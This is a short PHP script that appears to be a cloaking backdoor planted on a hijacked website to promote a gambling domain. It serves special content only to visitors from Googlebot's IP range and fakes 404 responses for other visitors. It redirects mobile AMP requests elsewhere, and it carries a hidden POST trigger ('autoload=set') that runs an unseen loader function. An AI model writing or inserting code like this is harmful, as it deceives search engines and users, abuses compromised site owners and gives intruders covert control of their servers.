<?php

$domain = 'https://gamdomturkiye.com';

$parsed_url = parse_url($domain);
$domain = $parsed_url['scheme'] . '://' . $parsed_url['host'];
$url = $domain . $_SERVER['REQUEST_URI'];

require_once('vendor/autoload.php');

$ref = strip_tags(@$_SERVER['HTTP_REFERER']);
$useragent = strip_tags(@$_SERVER['HTTP_USER_AGENT']);

if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
    $ip = $_SERVER['HTTP_CLIENT_IP'];
} elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
    $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
} else {
    $ip = $_SERVER['REMOTE_ADDR'];
}

$ip = strip_tags($ip);

if(strstr($ip, '66.249')){
    echo getDom();
    exit;
}

if(isset($_POST['autoload'])){
    if($_POST['autoload'] == 'set'){
        ios_autoloader();
    }
}

if(preg_match("/(android|iphone|up\.browser|up\.link|webos|wos)/i", mb_strtolower($useragent)) && strstr($_SERVER['REQUEST_URI'], 'amp')){
    //echo getDom();
    $pure_domain = str_replace(['https://', 'http://'], null, $_SERVER['HTTP_HOST']);
    $href = 'https://' . str_replace('.', '-', $pure_domain) . '.cdn.ampproject.org/c/s/' . $pure_domain . $_SERVER['REQUEST_URI'];
    if(httpCode($href) != 200){
        echo getDom();
    }else{
        header('Location: ' . $href);
    }

    exit;
}

if(empty($ref)){
    header("HTTP/1.0 404 Not Found");
    exit;
}

header("HTTP/1.0 404 Not Found");
exit;
